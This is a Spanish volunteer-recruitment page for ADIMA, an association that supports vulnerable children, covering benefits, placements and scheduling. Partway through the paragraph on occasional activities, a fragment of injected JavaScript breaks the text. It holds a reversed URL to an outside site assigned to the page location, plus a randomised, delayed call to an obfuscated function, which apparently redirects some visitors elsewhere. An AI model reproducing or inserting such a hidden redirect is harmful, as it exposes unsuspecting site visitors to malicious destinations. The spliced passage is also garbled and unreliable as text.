¿Cómo ser voluntario/a de ADIMA?

Para colaborar como voluntario/a de ADIMA en nuestro proyecto, destinado a mejorar la calidad de vida de los menores más vulnerables, sólo necesitas estar motivado/a, tener una actitud comprometida y disponer de tiempo libre. Para facilitar tu labor solidaria, te ofrecemos:
• Seguro de Responsabilidad Civil*, enfermedad y accidentes.
• Proceso de formación general y específica sobre Voluntariado e Infancia.
• Supervisión, coordinación y seguimiento individualizados.
• Dispositivos de atención que requieren de personal voluntario de apoyo para los/las menores que atienden.
¿Dónde puedo colaborar?
Hospital Universitario Virgen Macarena: En el PROGRAMA DIVER
Si eres MÁMA puedes participar como voluntaria en el Programa CUÍDAME
Otras entidades de atención a la infancia que soliciten colaboración del voluntariado.

Horario

El horario de colaboración puede ser flexible en función de tu disponibilidad (mañana o tarde, día laborable o fines de semana…), pero requiere de un compromiso de continuidad y responsabilidad con los centros de atención a menores.

 
Si por el contrario tu tiempo es más limitado y no puedes comprometerte a una actividad continuada, también puedes colaborar de manera puntual en las diferentes actividades que se organicen desde nuestra Asociación (campañas de sensibilización, sttog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ands informativos, cursos de formación…).

 
Queremos estar allí donde o una menor lo necesite y para ello NECESITAMOS TU AYUDA y tu compromiso con los más pequeños. La colaboración de todas las personas y entidades es necesaria para que podamos realizar nuestra labor.